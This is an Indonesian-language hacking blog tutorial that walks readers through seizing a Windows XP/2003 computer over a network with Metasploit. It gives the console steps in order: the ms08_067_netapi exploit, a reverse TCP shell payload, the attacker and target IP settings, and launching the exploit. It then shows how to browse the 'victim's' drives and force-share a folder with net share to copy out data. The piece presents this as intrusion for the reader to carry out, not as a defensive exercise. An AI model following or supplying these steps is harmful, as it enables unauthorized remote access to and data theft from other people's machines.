MENGAMBIL ALIH KOMPUTER TARGET DALAM JARINGAN(Win XP SP2, SP3, Win 2003, Win
Ho ho ho, akhirnya setalah istirahat panjang selama 3 tahun dari dunia IT, gue akhirnya kembali lagi. Kalau dalam film superhero “BATMAN RETURN”, no no… bukan BATMAN RETURN tapi oghie Return. Sekembali gue dari dunia Entertaintmen (bukan artis lho) banyak buanget perubahan yang berarti di dunia IT, termasuk hacking. Kalau dijaman gue dulu, terakhir gue sempat menggunakan Windows XP Sp1 yang terdapat banyak sekali kelemahan. Namun sekarang gue lihat bapak Bill Gates udah ngeluarin pamungkas barunya yang begitu megah yaitu Windows Pisang… Uppss bukan Pisang tapi Windows Vista. He he he. Belum lagi XP udah di patch kelemahannya hingga Service Pack 3. Tapi tetap saja mempunyai vulnerability. Mau bukti…?, ok ok kita to the point aje.
Kali ini teknik yang kita gunakan yaitu teknik Exploit dengan Menggunakan Metasploit. Dan Yang perlu kamu siapkan pada sesi kali ini yaitu:
- Metasploit Framework 3.2 For Windows, dapat kamu download disini: http://www.metasploit.org/framework/download/?id=framework-3.2.exe
- Komputer target yang menggunakan OS Win XP SP2, SP3, Win2003, atau WinVista. (gue menggunakan Windows XP SP2).
- - Alamat IP Address Target.
Jika diatas telah terpenuhi, sekarang kamu jalankan Program Metasploit 3.2, tepatnya kamu pilih Metasploit 3 Web (lihat gambar).
Tunggu beberapa saat,(sabar yach) Setelah itu akan tampil seperti gambar dibawah ini:
Jika udah tampil loe pilih menu Console. Maka akan tampil jendela seperti berikut:
Ketikkan perintah show exploits kemudian tekan Enter
Maka akan tampil Modul exploit seperti beirkut:
Kemudian pilih modul exploit untuk kelemahan pada Netapi32, caranya dengan mengetikkan :
use windows/smb/ms08_067_netapi kemudian Enter
Kemudian pilih jenis payload. Kali ini kita pilih payload yang akan menghubungkan shell komputer target dengan komputer penyerang melalui TCP. Caranya dengan mengetikkan perintah:
set payload windows/shell/reverse_tcp (kemudian Enter)
Kemudian masukkan IP Address kamu, dengan cara mengetikkan perintah :
set LHOST 192.168.0.17 Enter <----- contoh="" dengan="" gue.="" ip="" o:p="">
set LHOST 192.168.0.17 Enter <----- contoh="" dengan="" gue.="" ip="" o:p="">
Kemudian masukkan IP Address target kamu, dengan cara mengetikkan perintah :
set RHOST 192.168.0.16 Enter <----- contoh="" dengan="" gue.="" o:p="" target="">
set RHOST 192.168.0.16 Enter <----- contoh="" dengan="" gue.="" o:p="" target="">
Semuanya udah siap…? Siap…!!! Ready!!! 1….2….3… tunggu dulu bro, ketik dulu instruksi/perintah exploit kemudian tekan Enter.
Tedennnnggggg!!! Abrakadabra!!!, sistem target telah diambil alih
Sekarang kita telah berada di direktori c:\windows\system32 sang target. Akses penuh telah ditangan. Selanjutnya tinggal kreatifitas kalian. Untuk mengintip data pada komputer target, silahkan jalankan perintah MS DOS. Sebagai contoh, kita akan menuju drive “D” korban, dengan mengetikkan perintah >> d: Enter. Kemudian lakukan perintah DIR untuk melihat isi data drive D komputer korban.
Untuk mengambil data pada komputer korban, kita akan melakukan sharing paksa dari komputer korban dengan menjalankan perintah.
net share namafolder=d:\lokasifolder /UNLIMITED kemudian enter. Lihat gambar dibawah ini:
Kemudian masuk pada windows Explorer, lalu ketikkan pada Address Bar \\Alamat IP target\namafolder yang telah dishare paksa. Contoh:
Dan masih banyak lagi yang bisa kamu lakukan jika telah melakukan Remote Exploit (Eksploitasi Jarak Jauh) pada komputer target. Sekian dari saya, untuk ngomel-ngomelnya silahkan E-Mail atau YM di oghie_thecharacter
-=gREEts=-: metasploit.org, All crew COCONUT, HIMATEK AMIK Profesional Mks Angk 2003, boy, aLX, jinKur, aNwr, chALk, jHn, cNcu, aNie, R-ni, iMhe, dll yg ngg disebutin, CMOS, TSC. Uppz ampir lupa.
